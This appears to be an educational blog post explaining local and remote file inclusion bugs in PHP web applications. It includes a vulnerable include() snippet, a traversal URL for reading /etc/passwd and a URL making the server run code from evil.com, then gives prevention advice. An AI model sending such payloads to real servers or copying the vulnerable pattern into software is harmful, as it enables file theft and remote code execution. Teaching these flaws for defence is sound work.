Although not very common, file inclusion bugs can still be encountered in the wild and can prove to have a severe impact.

What is File Inclusion?

File inclusion are a type of bug where an attacker tricks the web application into exposing or running files on the web server.

Impact

File inclusion bugs can be divided into two categories. Depending on the category  the severity of the bug can increase.

Successful attack can lead to sensitive information disclosure, Cross-site scripting (XSS),  Remote Code Execution (RCE) and even full system compromise.

Local File Inclusion (LFI)

Using LFI an attacker can only include local files. Files that are already present on the server.

Imagine you com across a URL:

http://domain.com/?file=home

The following is an example of the vulnerable PHP code.

$file = $_GET['file']
include($file)

This means that the server will get the filename from the GET parameter. The attacker can exploit this by using a Directory Traversal and requesting sensitive files on the server such as:

http://domain.com/?file=../../../etc/passwd

Remote File Inclusion (RFI)

Similar to LFI, Remote File Inclusion occurs when an attacker inserts a path to a file malicious website as the file input. An example of this:

http://domain.com/?file=http://evil.com/evil.php

This vulnerability can be critical as code could be executed from everywhere on the internet. 

How to prevent File Inclusion?

The best way to prevent File Inclusion bugs is to:

  1. Never include files based on user input.
  2. If that is not possible, you should maintain a whitelist of files that can be included. 

Input validation can be used but it is not an effective solution as attackers will most likely search for tricks and clever ways to bypass this.

Follow us on twitter and don’t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.